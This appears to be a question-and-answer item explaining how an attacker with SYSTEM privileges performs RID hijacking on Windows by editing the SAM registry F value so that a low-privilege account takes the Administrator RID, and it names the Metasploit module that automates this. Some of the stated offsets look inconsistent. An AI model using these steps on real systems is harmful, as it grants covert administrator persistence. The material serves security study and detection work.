How can an attacker perform RID hijacking on a Windows system?

First, the attacker must obtain SYSTEM privileges. Then they navigate to `HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users` and locate the registry key corresponding to the low-privilege account (e.g., `000003E9` for RID 1001). They edit the F key, setting the little-endian values at offsets 0x30f and 0x31f to the hexadecimal representation of the target RID (e.g., `01F4` for the built-in Administrator RID 500). After logging out and back in, the account inherits the target's privileges. The Metasploit module `windows/manage/rid_hijack` automates this process.